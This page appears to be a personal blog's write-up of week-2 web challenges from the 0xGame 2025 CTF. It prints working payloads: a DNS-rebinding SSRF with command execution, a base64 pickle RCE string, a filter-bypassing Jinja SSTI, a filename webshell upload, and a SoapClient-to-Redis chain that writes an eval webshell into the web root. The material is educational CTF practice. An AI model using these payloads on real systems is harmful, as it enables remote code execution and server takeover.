

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/avatar.png">
  <link rel="icon" href="/img/avatar.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Xendr1a">
  <meta name="keywords" content="">
  
    <meta name="description" content="0xgame2025（week2DNS想要玩1234567891011121314151617181920212223242526272829303132333435363738394041424344from flask import Flask, requestfrom urllib.parse import urlparseimport socketimport osapp &#x3D; Flask(">
<meta property="og:type" content="article">
<meta property="og:title" content="0xgame2025">
<meta property="og:url" content="https://xendr1a.github.io/2025/10/23/0xgame2025-week2/index.html">
<meta property="og:site_name" content="Xendr1a的小窝">
<meta property="og:description" content="0xgame2025（week2DNS想要玩1234567891011121314151617181920212223242526272829303132333435363738394041424344from flask import Flask, requestfrom urllib.parse import urlparseimport socketimport osapp &#x3D; Flask(">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-10-23T14:42:18.000Z">
<meta property="article:modified_time" content="2026-06-11T10:25:41.631Z">
<meta property="article:author" content="Xendr1a">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="WP">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>0xgame2025 - Xendr1a的小窝</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"xendr1a.github.io","root":"/","version":"1.9.9","typing":{"enable":true,"typeSpeed":50,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":"¶"},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"expand_all":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":false,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"openkounter":{"server_url":"https://open-kounter.mintimate.cn","path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 8.1.2"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Xendr1a</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content (desktop) -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

<!-- Mobile grid menu overlay -->
<div id="mobile-grid-menu" class="d-lg-none">
  <div class="mobile-grid-menu-inner">
    <div class="container">
      <div class="row">
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-home-fill"></i>
                  <span>首页</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/archives/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-archive-fill"></i>
                  <span>归档</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/categories/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-category-fill"></i>
                  <span>分类</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/tags/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-tags-fill"></i>
                  <span>标签</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/about/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-user-fill"></i>
                  <span>关于</span>
                </div>
              </a>
            </div>
          
        
        
          <div class="col-4 mobile-grid-cell" id="mobile-search-btn">
            <a href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <div class="mobile-grid-item">
                <i class="iconfont icon-search"></i>
                <span>搜索</span>
              </div>
            </a>
          </div>
        
        
          <div class="col-4 mobile-grid-cell" id="mobile-color-toggle-btn"
               data-label-light="开灯"
               data-label-dark="关灯">
            <a href="javascript:;" aria-label="Color Toggle">
              <div class="mobile-grid-item">
                <i class="iconfont icon-dark" id="mobile-color-toggle-icon"></i>
                <span id="mobile-color-toggle-label">关灯</span>
              </div>
            </a>
          </div>
        
      </div>
    </div>
  </div>
</div>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="0xgame2025"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-10-23 22:42" pubdate>
          2025年10月23日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          5.4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          45 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>



</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">0xgame2025</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="0xgame2025（week2"><a href="#0xgame2025（week2" class="headerlink" title="0xgame2025（week2"></a>0xgame2025（week2</h1><h2 id="DNS想要玩"><a href="#DNS想要玩" class="headerlink" title="DNS想要玩"></a>DNS想要玩</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask, request<br><span class="hljs-keyword">from</span> urllib.parse <span class="hljs-keyword">import</span> urlparse<br><span class="hljs-keyword">import</span> socket<br><span class="hljs-keyword">import</span> os<br><br>app = Flask(__name__)<br><br>BlackList = [<br>    <span class="hljs-string">&#x27;localhost&#x27;</span>,<br>    <span class="hljs-string">&#x27;@&#x27;</span>,<br>    <span class="hljs-string">&#x27;172&#x27;</span>,<br>    <span class="hljs-string">&#x27;gopher&#x27;</span>,<br>    <span class="hljs-string">&#x27;file&#x27;</span>,<br>    <span class="hljs-string">&#x27;dict&#x27;</span>,<br>    <span class="hljs-string">&#x27;tcp&#x27;</span>,<br>    <span class="hljs-string">&#x27;0.0.0.0&#x27;</span>,<br>    <span class="hljs-string">&#x27;114.5.1.4&#x27;</span><br>]<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">check</span>(<span class="hljs-params">url</span>):<br>    url = urlparse(url)<br>    host = url.hostname<br>    host_acscii = host.encode(<span class="hljs-string">&#x27;idna&#x27;</span>).decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)<br>    <span class="hljs-keyword">return</span> socket.gethostbyname(host_acscii) == <span class="hljs-string">&#x27;114.5.1.4&#x27;</span><br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/&#x27;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>():<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">open</span>(__file__).read()<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/ssrf&#x27;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">ssrf</span>():<br>    raw_url = request.args.get(<span class="hljs-string">&#x27;url&#x27;</span>)<br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> raw_url:<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;URL Needed&#x27;</span><br>    <span class="hljs-keyword">for</span> u <span class="hljs-keyword">in</span> BlackList:<br>        <span class="hljs-keyword">if</span> u <span class="hljs-keyword">in</span> raw_url:<br>            <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;Invaild URL&#x27;</span><br>    <span class="hljs-keyword">if</span> check(raw_url):<br>        <span class="hljs-keyword">return</span> os.popen(request.args.get(<span class="hljs-string">&#x27;cmd&#x27;</span>)).read()<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;NONONO&quot;</span><br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    app.run(host=<span class="hljs-string">&#x27;0.0.0.0&#x27;</span>, port=<span class="hljs-number">8000</span>)<br></code></pre></td></tr></table></figure>

<p>就是要通过让hostname&#x3D;&#x3D;114.5.1.4      数字绕过好像都不行，用的DNS 重绑定<br>这个地址<strong><a target="_blank" rel="noopener" href="https://lock.cmpxchg8b.com/rebinder.html">https://lock.cmpxchg8b.com/rebinder.html</a></strong></p>
<p>​<code>payload：ssrf?url=http://72050104.c0a80001.rbndr.us&amp;cmd=cat /flag</code></p>
<h2 id="你好，⽖洼脚本"><a href="#你好，⽖洼脚本" class="headerlink" title="你好，⽖洼脚本"></a>你好，⽖洼脚本</h2><p>丢控制台跑就行</p>
<h2 id="⻢哈⻥商店"><a href="#⻢哈⻥商店" class="headerlink" title="⻢哈⻥商店"></a>⻢哈⻥商店</h2><p>我们先注册，然后是一个购物界面</p>
<p>&#123;% asset_img 8e38ded3-4842-49f1-8ea7-37257aeccecc-20251023234542-oxdbfe2 8e38ded3-4842-49f1-8ea7-37257aeccecc %}</p>
<p>我们抓包，发现我们买不起一些东西，我们买不起1个那我们就买半个，半个买不起我们就再减少</p>
<p>&#123;% asset_img febd5499-5aa4-42b7-be0f-6c50c1538e70-20251023234743-94lckh5 febd5499-5aa4-42b7-be0f-6c50c1538e70 %}</p>
<p>测得只有最后一个回显不一样</p>
<p>&#123;% asset_img c9e7dfa0-099f-4638-aac5-08d0742a9faa-20251023234757-m4nt46i c9e7dfa0-099f-4638-aac5-08d0742a9faa %}</p>
<p>我们点进去获得这一串代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs python">Use GET To Send Your Loved Data!!!      <br>BlackList = [<span class="hljs-string">b&#x27;\x00&#x27;</span>, <span class="hljs-string">b&#x27;\x1e&#x27;</span>]      <br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/pickle_dsa&#x27;</span></span>)</span><br> <span class="hljs-keyword">def</span> <span class="hljs-title function_">pic</span>():<br> data = request.args.get(<span class="hljs-string">&#x27;data&#x27;</span>)<br> <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> data:<br> <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;Use GET To Send Your Loved Data&quot;</span><br> <span class="hljs-keyword">try</span>:<br> data = base64.b64decode(data)<br> <span class="hljs-keyword">except</span> Exception:<br> <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;Cao!!!&quot;</span><br> <span class="hljs-keyword">for</span> b <span class="hljs-keyword">in</span> BlackList:<br> <span class="hljs-keyword">if</span> b <span class="hljs-keyword">in</span> data:<br> <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;</span><br><span class="hljs-string">卡了</span><br><span class="hljs-string">&quot;</span><br> p = pickle.loads(data)<br> <span class="hljs-built_in">print</span>(p)<br> <span class="hljs-keyword">return</span> <span class="hljs-string">f&quot;&lt;p&gt;Vamos! <span class="hljs-subst">&#123;p&#125;</span>&lt;p&gt;</span><br></code></pre></td></tr></table></figure>

<p>pickle反序列化</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">payload：/pickle_dsa?data=Y19fYnVpbHRpbl9fCmV2YWwKcDAKKFMie19faW1wb3J0X18oJ29zJykucG9wZW4oJ2VudicpLnJlYWQoKX0iCnAxCnRwMgpScDMKLg==<br></code></pre></td></tr></table></figure>

<h2 id="404NotFound"><a href="#404NotFound" class="headerlink" title="404NotFound"></a>404NotFound</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs python">dirsearch扫出这玩意发现没用<br>[<span class="hljs-number">11</span>:<span class="hljs-number">41</span>:<span class="hljs-number">49</span>] Starting: <br>[<span class="hljs-number">11</span>:<span class="hljs-number">42</span>:<span class="hljs-number">37</span>] <span class="hljs-number">200</span> -    2B  - /ping<br>[<span class="hljs-number">11</span>:<span class="hljs-number">42</span>:<span class="hljs-number">43</span>] <span class="hljs-number">404</span> -  207B  - /static/api/swagger.json<br>[<span class="hljs-number">11</span>:<span class="hljs-number">42</span>:<span class="hljs-number">43</span>] <span class="hljs-number">404</span> -  207B  - /static/api/swagger.yaml<br>[<span class="hljs-number">11</span>:<span class="hljs-number">42</span>:<span class="hljs-number">43</span>] <span class="hljs-number">404</span> -  207B  - /static/dump.sql<br></code></pre></td></tr></table></figure>

<p>测半天原来是url的ssti</p>
<p>&#123;% asset_img 9f50e2e6-d159-45dd-9eb2-a21e4ce677cc-20251024143651-eaignte 9f50e2e6-d159-45dd-9eb2-a21e4ce677cc %}</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">过滤了sys, subprocess, <span class="hljs-built_in">eval</span>, <span class="hljs-built_in">exec</span>, <span class="hljs-keyword">lambda</span>, <span class="hljs-built_in">input</span>, init, <span class="hljs-keyword">class</span>, <br><span class="hljs-built_in">set</span>,.， <span class="hljs-keyword">from</span>, flask, request, os, <span class="hljs-keyword">import</span>, subclasses,<span class="hljs-built_in">dict</span>, <br><span class="hljs-built_in">globals</span>, <span class="hljs-built_in">locals</span>, <span class="hljs-variable language_">self</span>, config, app, popen, file, templates<br></code></pre></td></tr></table></figure>

<p>拼接绕</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">&amp;<span class="hljs-comment">#123;&amp;#123;lipsum[&#x27;__glob&#x27;+&#x27;als__&#x27;][&#x27;__bui&#x27;+&#x27;ltins__&#x27;][&#x27;__imp&#x27;+&#x27;ort__&#x27;](&#x27;o&#x27;+&#x27;s&#x27;)[&#x27;po&#x27;+&#x27;pen&#x27;](&#x27;cat /f*&#x27;)|attr(&#x27;read&#x27;)()&amp;#125;&amp;#125;</span><br></code></pre></td></tr></table></figure>

<h2 id="我只想要你的PNG！"><a href="#我只想要你的PNG！" class="headerlink" title="我只想要你的PNG！"></a>我只想要你的PNG！</h2><p>源码里面有check.php,我们进去看看发现是目录</p>
<p>如何我们抓包传个png文件发现，check.php有显示目录</p>
<p>&#123;% asset_img 408a063b-0400-4ac0-8352-c9d112efdd2c-20251024145225-8so4kqh 408a063b-0400-4ac0-8352-c9d112efdd2c %}</p>
<p>check.php的话既然是php文件那我们可以试试文件名写马（第一次遇到写在文件名的</p>
<p>&#123;% asset_img 2e159130-65f4-42ec-9a95-be9259d142bc-20251024145334-ukmie49 2e159130-65f4-42ec-9a95-be9259d142bc %}</p>
<p>然后我们蚁剑连接一下这个check.php，获得flag</p>
<h2 id="这真的是反序列化"><a href="#这真的是反序列化" class="headerlink" title="这真的是反序列化"></a>这真的是反序列化</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><br><span class="hljs-comment">//hint: Redis20251206</span><br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">pure</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$web</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$misc</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$crypto</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$pwn</span>;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$web</span>, <span class="hljs-variable">$misc</span>, <span class="hljs-variable">$crypto</span>, <span class="hljs-variable">$pwn</span></span>)</span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;web = <span class="hljs-variable">$web</span>;<br>        <span class="hljs-variable language_">$this</span>-&gt;misc = <span class="hljs-variable">$misc</span>;<br>        <span class="hljs-variable language_">$this</span>-&gt;crypto = <span class="hljs-variable">$crypto</span>;<br>        <span class="hljs-variable language_">$this</span>-&gt;pwn = <span class="hljs-variable">$pwn</span>;<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">reverse</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;pwn = <span class="hljs-keyword">new</span> <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">web</span>(<span class="hljs-variable">$this</span>-&gt;misc, <span class="hljs-variable">$this</span>-&gt;crypto);<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">osint</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;pwn-&gt;<span class="hljs-title function_ invoke__">play_0xGame</span>();<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">reverse</span>();<br>        <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">osint</span>();<br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$AI</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;ai&#x27;</span>];<br><br><span class="hljs-variable">$ctf</span> = <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$AI</span>);<br><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>看到Redis的话应该是打ssrf，后面估计是密码，我们看看链子</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">osint</span>(<span class="hljs-params"></span>)</span>&#123;<br>    <span class="hljs-variable language_">$this</span>-&gt;pwn-&gt;<span class="hljs-title function_ invoke__">play_0xGame</span>();<br>&#125;<span class="hljs-comment">//这里调用了一个不存在的方法，那我们想到call()，那3应该是</span><br></code></pre></td></tr></table></figure>

<p>那ssrf加上内置类我们想到了SoapClient类里面有call()方法，可以看看</p>
<p>&#123;% asset_img 1c3bced2-a8ab-4de8-95a9-e5d08d8098a1-20251025190221-9jyb1d4 1c3bced2-a8ab-4de8-95a9-e5d08d8098a1 %}</p>
<p>链子应该还好就是触发SoapClient类</p>
<p>然后，然后就卡了（苦笑~，主播只是个会用gopherus的脚本小子，看官方wp</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">pure</span></span><br><span class="hljs-class"> </span>&#123;<br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$web</span>;<br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$misc</span>;<br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$crypto</span>;<br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$pwn</span>;<br> &#125; <br> <span class="hljs-variable">$a</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">pure</span>();<br> <span class="hljs-variable">$a</span>-&gt;web = <span class="hljs-string">&#x27;SoapClient&#x27;</span>;<br> <span class="hljs-variable">$a</span>-&gt;misc = <span class="hljs-literal">null</span>;<br> <span class="hljs-variable">$target</span> = <span class="hljs-string">&#x27;http://127.0.0.1:6379/&#x27;</span>;<br> <span class="hljs-variable">$poc</span> = <span class="hljs-string">&quot;AUTH 20251206\r\nCONFIG SET dir /var/www/html/\r\nCONFIG SET </span><br><span class="hljs-string">dbfilename shell.php\r\nSET x &#x27;&lt;?= @eval(\$_POST[1]) ?&gt;&#x27;\r\nSAVE&quot;</span>;<br> <span class="hljs-variable">$a</span>-&gt;crypto = <span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;location&#x27;</span> =&gt; <span class="hljs-variable">$target</span>, <span class="hljs-string">&#x27;uri&#x27;</span> =&gt; <span class="hljs-string">&quot;hello\&quot;\r\n&quot;</span> . <span class="hljs-variable">$poc</span> . <br><span class="hljs-string">&quot;\r\nhello&quot;</span>);<br> <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(<span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$a</span>));<span class="hljs-comment">//说实话第一眼只能看懂在写马</span><br></code></pre></td></tr></table></figure>

<p>我们来看看$poc</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php">Redis 服务器的原始协议命令（这玩意说实话我第一次了解，主播还是太菜了<br><span class="hljs-string">&quot;AUTH 20251206\r\n&quot;</span> .                              <span class="hljs-comment">// 登录密码就是20251206</span><br><span class="hljs-string">&quot;CONFIG SET dir /var/www/html/\r\n&quot;</span> .              <span class="hljs-comment">// 设定工作目录（web 根）</span><br><span class="hljs-string">&quot;CONFIG SET dbfilename shell.php\r\n&quot;</span> .            <span class="hljs-comment">// 设定持久化文件名</span><br><span class="hljs-string">&quot;SET x &#x27;&lt;?= @eval(\$_POST[1]) ?&gt;&#x27;\r\n&quot;</span> .           <span class="hljs-comment">// 写马</span><br><span class="hljs-string">&quot;SAVE\r\n&quot;</span> .  <span class="hljs-comment">//保存</span><br></code></pre></td></tr></table></figure>

<p>然后要注意的点就是$target &#x3D; ‘<a target="_blank" rel="noopener" href="http://127.0.0.1:6379/';%E8%BF%99%E4%B8%AA%E6%98%AF%E5%86%85%E7%BD%91">http://127.0.0.1:6379/&#39;;这个是内网</a> Redis 地址</p>
<p>传参然后连蚁剑（磕磕碰碰终于做完了</p>
<p>&#123;% asset_img 4fc71cfd-70df-4b9a-bb8b-cc4002b13dc2-20251025201231-09ajm6x 4fc71cfd-70df-4b9a-bb8b-cc4002b13dc2 %}</p>
<h1 id="总结一下"><a href="#总结一下" class="headerlink" title="总结一下"></a>总结一下</h1><p>这个拖了好久了，一直懒得去复现最后这个反序列化（主要是怕麻烦，懒癌这一块.&#x2F;</p>
<p>每次做题都能学到新知识就是了，希望自己不要那么懒了，希望这个是个新的开始</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
